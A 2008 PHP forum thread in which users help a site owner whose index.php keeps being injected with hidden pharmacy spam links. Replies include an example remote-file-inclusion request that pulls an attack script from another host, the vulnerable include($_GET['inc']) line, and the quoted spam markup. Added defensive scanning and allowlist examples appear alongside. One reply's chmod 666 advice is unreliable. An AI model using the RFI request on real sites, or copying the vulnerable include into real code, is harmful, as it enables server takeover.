Site is hacked, custom PHP programming

Discussion in 'PHP' started by yohanip, May 30, 2008.

  1. #1
    Hello!
    What a great world the internet is.. :)
    My site got hacked several times, although the site was just a free site, didn't collect any user information, just posting some valuable information.. hmm, but the site frequently gets hacked..

    I would like to ask for help. I would like to know, what kind of hacking is it that posts so many active hidden links on an index.php page?

    I've implemented:
    • validating $_GET[]
    • disabling global variables
    • disabling OS commands

    but I did log on to cPanel and found that my site is hacked again.. :(

    Anyone having a similar experience around this matter? How did you all solve this kind of problem?

    Thank you very much in advance
    Regards,
    Yohan..

    ps. The site is on the sig link
     
    yohanip, May 30, 2008 IP
  2. -bank-

    -bank- Well-Known Member

    #2
    Probably easy passwords, usually the fastest way to hack, try changing them, else swap the script you're running on.
     
    -bank-, May 31, 2008 IP
  3. Randombase

    Randombase Peon

    #3
    Or the whole server got compromised and you are being a victim of a hack through another account.
     
    Randombase, May 31, 2008 IP
  4. Skullborg

    Skullborg Guest

    #4
    Eh, your site might have an RFI vulnerability, or if it has a DB, the hacker might have SQL injected it and got the admin pass.
     
    Skullborg, May 31, 2008 IP
  5. yohanip

    yohanip Well-Known Member

    #5
    Wow, haven't thought about SQL injection, I'm adding some security measures now, let's see if it gets hacked again.. ;)

    It's quite entertaining to see the work of the hacker, he/she is just adding some "<a hrefs>" and they are without any anchor text.. ex: <a href="http://somesite.blabla.com"></a> things.. didn't do any 'defacing' or anything else, I wonder.. what kind of hacking is this..

    Anyway.. I do salute the hacker :D
     
    yohanip, May 31, 2008 IP
  6. swordbeta

    swordbeta Banned

    #6
    swordbeta, May 31, 2008 IP
  7. Randombase

    Randombase Peon

    #7
    Cheap backlink method, it's probably a mass deface script. You can check this by seeing whether every index.php/html file has these lines of code.
     
    Randombase, May 31, 2008 IP
  8. Skullborg

    Skullborg Guest

    #8
    Ah, script kiddies everywhere. Btw yohanip, watch out for RFI loopholes too, they can be dangerous. ;) Anybody could upload a shell and own the whole thing if you have an RFI vulnerability on your site.
     
    Skullborg, May 31, 2008 IP
  9. yohanip

    yohanip Well-Known Member

    #9
    Thank you very much! Btw, what is an RFI vulnerability?
     
    yohanip, May 31, 2008 IP
  10. SteveWh

    SteveWh Member

    #10
    RFI means Remote File Inclusion. It is an attempt to trick your server into reading a file from a remote server (not yours), including its text into your PHP script, and getting it to execute as though it's part of your script.

    When you see an entry in your logs that looks like this:

    http:/yoursite/page.php?inc=http:/othersite/safe.txt?

    it is an RFI attack. If your script has a variable called inc and register_globals is on, and allow_url_fopen is on, then your server will get the safe.txt file (usually a PHP hacking script), execute it as part of your web page, and the site will be instantly hacked.
     
    SteveWh, Jun 1, 2008 IP
  11. yohanip

    yohanip Well-Known Member

    #11
    I'm assuming that the vulnerability was in the Apache handlers then?

    Oh, news flash :p By the time I typed this, I tried visiting the website again and it was all hacked up again, and he/she is still hiding the anchor text of the links.. here is a code snippet: (the hacker is appending this code to my original "index.php" script)
    Code (markup):
    <div id="wp_internal" style="position:absolute;left:-6012px;top:0px;">
    <ul><li><a href="http://job era. com/ 2007/05/ 16/levitra- lady/">levitra lady</a></li>
    <li>........ [b]there maybe hundreds of em[/b]
    </ul></div>

    <font style='position: absolute;overflow: hidden;height: 0;width: 0'><ul><li><a href="http:// mensleade rshipforum chicago. org/2007/04/04/hydrocodone-and-pharmacy/">hydrocodone and pharmacy</a></li> ...............[b]arround 100times[/b]</ul></font>

    Thanks!
     
    yohanip, Jun 1, 2008 IP
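
A check for this kind of injection, as an added example that is not part of the original thread: it walks a document root and reports index.php / index.html files that contain links plus an element styled off-screen or collapsed to zero size, the two patterns visible in the snippet above. The function name find_hidden_link_blocks() and both regular expressions are assumptions built only from that snippet and would need tuning for other injected markup.

```php
<?php
// Added example, not from the thread. find_hidden_link_blocks() and the
// patterns below are illustrative, derived only from the snippet above.

/**
 * Return [path => [pattern names]] for index.php / index.html files under
 * $root whose content matches a hidden-link-block pattern.
 */
function find_hidden_link_blocks($root)
{
    $patterns = array(
        // style="position:absolute;left:-6012px;..." : pushed far off-screen
        'offscreen' => '/style\s*=\s*["\'][^"\']*position\s*:\s*absolute[^"\']*(left|top)\s*:\s*-\d{3,}px/i',
        // style='...height: 0;width: 0' : collapsed to nothing
        'zero-size' => '/style\s*=\s*["\'][^"\']*height\s*:\s*0(px)?\s*;[^"\']*width\s*:\s*0(px)?\s*[;"\']/i',
    );
    $hits = array();
    $iter = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($iter as $file) {
        if (!$file->isFile() || !preg_match('/^index\.(php|html?)$/i', $file->getFilename())) {
            continue;
        }
        $body = file_get_contents($file->getPathname());
        if ($body === false || stripos($body, '<a ') === false) {
            continue; // unreadable, or no links at all
        }
        foreach ($patterns as $name => $re) {
            if (preg_match($re, $body)) {
                $hits[$file->getPathname()][] = $name;
            }
        }
    }
    return $hits;
}

// Usage: php scan.php /path/to/public_html
$root = isset($argv[1]) ? $argv[1] : '.';
foreach (find_hidden_link_blocks($root) as $path => $names) {
    printf("%s  mtime=%s  patterns=%s\n", $path, date('c', filemtime($path)), implode(',', $names));
}
```

The modification time printed for each hit gives a starting point for matching the change against FTP and web server logs.
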
  12. Ang3r

    Ang3r Peon

    #12
    It is possible that the hacker has uploaded some bad script on your server and he can access your site via that file even after you fixed the vulnerability. It might be a PHP shell or something like that. Check your PHP logs, and if you are on shared hosting ask your provider to help you. Try to find out the method the hacker is using to edit your index file, whether he is doing it via FTP or PHP. Double check your file permissions and don't give writing or executing permissions to the public group. Better to do chmod "666" on files and "755" on folders. Hackers usually upload a PHP shell after hacking a site via RFI. It might be SQL injection too; for that use some good encryption for your password and use a strong password. Better to check your script for SQL vulnerabilities and other vulnerabilities.

    I hope it will help you. You can ask me more about it.
     
    Ang3r, Jun 1, 2008 IP
  13. yohanip

    yohanip Well-Known Member

    #13
    Thank you :D
    I'm contacting the hosting company right away..
    I wonder.. is there any way to change the PHP ini file through cPanel on shared hosting.. anyone please?
     
    yohanip, Jun 1, 2008 IP
  14. SteveWh

    SteveWh Member

    #14
    The actual vulnerability is usually in an application like WordPress or forum or shopping cart software, etc., or in a user-built PHP script.

    If any of those are out of date, they're suspects.

    Here's a simple case of vulnerable PHP code:

    include($_GET['inc']);

    Presumably the author wants to specify which page to include via the URL, but it's vulnerable because a hacker can substitute any URL, such as in the example in the previous post.

    Although the vulnerability is in a script somewhere, there's more than one way to guard against RFI. It's not a bad idea to use all of them. Attacks can be blocked by a) fixing the script, b) in php.ini by turning off register_globals and allow_url_fopen, c) in .htaccess by turning off register_globals. Unfortunately, you can't disable allow_url_fopen in .htaccess.

    You can also use .htaccess to block all requests where the query string contains "http" or "ftp".
     
    SteveWh, Jun 1, 2008 IP
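
One way to do option (a) from the post above, fixing the script, shown as an added example that is not code from the thread: the value of inc only selects a key in a fixed allowlist and never reaches include() as a path or URL. The function name resolve_page(), the page keys and the pages/ directory are assumptions for illustration.

```php
<?php
// Added example, not from the thread. resolve_page(), the page keys and
// the pages/ directory are hypothetical names chosen for illustration.

// Vulnerable form quoted in the post above:
//   include($_GET['inc']);

/**
 * Map a user-supplied page name to a file under $baseDir.
 * Returns the absolute path to include, or null if the request is rejected.
 */
function resolve_page($requested, array $allowed, $baseDir)
{
    // Only plain strings are accepted; ?inc[]=x arrives as an array.
    if (!is_string($requested)) {
        return null;
    }
    // The allowlist is the real control: user input selects a key,
    // it never becomes part of a path or URL.
    if (!array_key_exists($requested, $allowed)) {
        return null;
    }
    // Defence in depth: the mapped file must exist inside $baseDir.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $allowed[$requested]);
    if ($base === false || $path === false) {
        return null;
    }
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$allowed = array('home' => 'home.php', 'about' => 'about.php');
$inc     = isset($_GET['inc']) ? $_GET['inc'] : 'home';
$file    = resolve_page($inc, $allowed, __DIR__ . '/pages');

if ($file === null) {
    // Any value that is not an allowlist key ends here, including the
    // ?inc=http:/othersite/safe.txt? request shown earlier in the thread.
    header('HTTP/1.1 404 Not Found');
    exit('Page not found');
}
include $file;
```
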
  15. SteveWh

    SteveWh Member

    #15
    It depends on where your php.ini is located, and that depends on the host, so ask them. If you are allowed to have your own php.ini, then it will be (or you can create it) in public_html, and you can edit it from cPanel > File Manager. It's a plain text file.
     
    SteveWh, Jun 1, 2008 IP
  16. yohanip

    yohanip Well-Known Member

    #16
    Thank you very much, you are indeed a guru :D
     
    yohanip, Jun 1, 2008 IP
  17. freelink4u

    freelink4u Banned

    #17
    You have your own server???
    Install a firewall, then install AV.. more than 60% of attacks are blocked by antivirus. Then install chkroot hunter and other security measures. And also you must install ELs script for your server.
    Change the IP of the SSH server. Change the SSH port. And also on top of that disable SSH for all your clients and sites. And make sure that you have scanned your whole server for rootkits. And then manually scan all your clients.
     
    freelink4u, Jun 1, 2008 IP
  18. yohanip

    yohanip Well-Known Member

    #18
    This is deep :p Unfortunately I'm still using a shared hosting solution. Anyway, I'm trying to create a php.ini file in the public_html root, but.. is it safe to do that? If it's in public_html.. wouldn't it be visible to every visitor?..
    aww.. the headache of security programming..
     
    yohanip, Jun 1, 2008 IP
  19. freelink4u

    freelink4u Banned

    #19
    Yes, you are right.. try to save that file in the home dir other than public_html
     
    freelink4u, Jun 1, 2008 IP
  20. Ang3r

    Ang3r Peon

    #20
    Didn't he already say that he is using shared hosting?

    Nice tips anyway. :)
     
    Ang3r, Jun 1, 2008 IP